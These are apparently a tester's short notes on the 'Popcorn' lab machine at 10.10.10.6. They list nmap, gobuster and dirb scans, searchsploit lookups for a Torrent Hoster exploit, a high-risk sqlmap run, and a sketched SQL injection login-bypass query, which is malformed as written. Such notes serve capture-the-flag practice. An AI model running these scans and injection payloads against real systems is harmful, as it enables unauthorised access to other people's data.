#nmap -sC -sV -oA nmap/popcorn-10.10.10.6-nmap-report 10.10.10.6
#nmap -T4 -A -v 10.10.10.6
#gobuster -u http://10.10.10.6 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
#gobuster -u http://10.10.10.6/torrent -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt  -o popcorn-10.10.10.6-gobuster-report
#dirb http://10.10.10.6 -r -o report.dirb
#searchsploit "torrent hoster"
#searchsploit -x 11746.txt
#sqlmap -r sqli.req --level 5 --risk 3
#python -m SimpleHTTPServer




====
SQLI
====

FIELDS:: userName, password, privilege, email.
DB: users

>> select userName,password from users where=userName=''or"=''and password=''or"=''limit 0,1;



SOURCES: https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
